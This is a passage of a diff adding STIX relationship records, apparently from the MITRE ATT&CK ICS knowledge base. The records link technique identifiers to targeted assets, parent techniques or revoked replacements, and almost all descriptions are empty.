+ "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--6c2957f9-502a-478c-b1dd-d626c0659413", + "target_ref": "attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f65fa052-5ad0-4fc3-b579-ee33d1225659", + "created": "2023-09-28T19:55:58.229Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:55:58.229Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f67134f6-7f34-4b8a-89ef-9ecd6d9ca191", + "created": "2020-01-30T19:55:39.116Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--c23b740b-a42b-47a1-aec2-9d48ddd547ff", + "target_ref": "attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f6793a77-0e1e-470e-821e-2037fcb297d9", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c1b68a96-3c48-49ea-a6c0-9b27359f9c19", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f683ebaf-6ffb-46d2-a317-ddf209400fbd", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f68daab7-13a7-4462-a59f-06279cc0a753", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f691dde5-bb2d-411b-a381-b33e0ab673d6", + "created": "2023-09-28T20:12:09.661Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:12:09.661Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f6a320d4-51a9-4b14-8764-4f5c40a84fe8", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea071aa0-8f17-416f-ab0d-2bab7e79003d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f6c52b80-6bbc-4a80-9455-40046356cb98", + "created": "2020-02-11T19:13:33.736Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--768dce68-8d0d-477a-b01d-0eea98b963a1", + "target_ref": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f6c5d261-1395-41aa-895b-2cd292cf525f", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e0232cb0-ded5-4c2e-9dc7-2893142a5c11", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f6c95470-8190-4f93-9bd3-a1cb9ec09425", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f6dab4c6-6f2e-4038-827f-16aa1fd7d8e9", + "created": "2020-03-19T19:17:58.690Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--36675cd3-fe00-454c-8516-aebecacbe9d9", + "target_ref": "attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f6dd16cc-0ce5-4a65-af8a-4e3f8cdd9d04", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f6e1694f-4808-42d2-a90a-c9b86c10ca42", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f6e3972b-afc2-4dd6-972a-4fe73747dfe4", + "created": "2023-09-05T14:19:19.911Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-05T14:19:19.911Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--ca00366b-83a1-4c7b-a0ce-8ff950a7c87f", + "target_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f70b7d19-eb60-4763-ba49-f338ce5e538e", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--768dce68-8d0d-477a-b01d-0eea98b963a1", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f70f1b3d-5254-47dc-9a6d-c7f3f0210d1b", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4d2a5b3e-340d-4600-9123-309dd63c9bf8", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f711b3c0-0ee3-4ca8-b129-93c7d58ba60b", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f7215c1f-7bd7-41bd-8466-76caac225c7c", + "created": "2023-09-29T16:45:42.977Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:45:42.977Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f72a7a30-bab4-445b-b226-d5c3cd1a5846", + "created": "2023-09-29T18:47:39.450Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:47:39.450Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f72d1028-72d6-4973-a70a-0937dbce5dce", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f7444f78-c852-4aff-8065-373c306db9b2", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--851e071f-208d-4c79-adc6-5974c85c78f3", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f756727d-bf9c-45eb-9401-e1659649a716", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f77a4a40-e463-4465-ab6d-9b2d9271625b", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f77e6db1-ef46-4ff9-8947-803a45e30667", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f7a11ad8-80ac-4b0e-8749-102958f57f62", + "created": "2020-10-19T19:53:10.862Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d", + "target_ref": "attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f7b8ef19-94d4-46a2-9fcc-25503d324366", + "created": "2024-05-22T17:25:50.691Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T03:39:08.920Z", + "description": "Asset Mapping Rationale: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for subsequent Lateral Movement or Discovery techniques.", + "relationship_type": "targets", + "source_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f7bdbc1f-d08c-48a0-a474-a79b91526138", + "created": "2023-09-28T20:31:31.498Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:31:31.498Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f7c67c9d-3a7c-4372-a480-14ff4b04e000", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f7d672f6-993b-4036-961d-f6e22e94446c", + "created": "2024-04-09T20:48:30.734Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-04-09T20:48:30.734Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f80313e6-0c5e-4dfe-8c58-fdfd1b9994dd", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f8057de8-491f-40ad-b2aa-50d6ad4ecde0", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--22522668-ddf6-470b-a027-9d6866679f67", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f82277ac-8796-4034-a326-4d1433f4bd5f", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f823cffe-1f48-499e-a7b9-58f12e0b95b4", + "created": "2020-03-09T13:00:19.485Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", + "target_ref": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f829c482-2ab8-4a8e-a7b4-390fc8f476c4", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f82b5246-b3ed-4d54-b85b-36b7f3fc7b37", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f8456c9b-a4a5-4f13-94e3-54c787b21089", + "created": "2023-09-28T20:16:40.519Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:16:40.519Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f85346e8-80c1-4078-8c1f-e5bcc4c533b6", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": 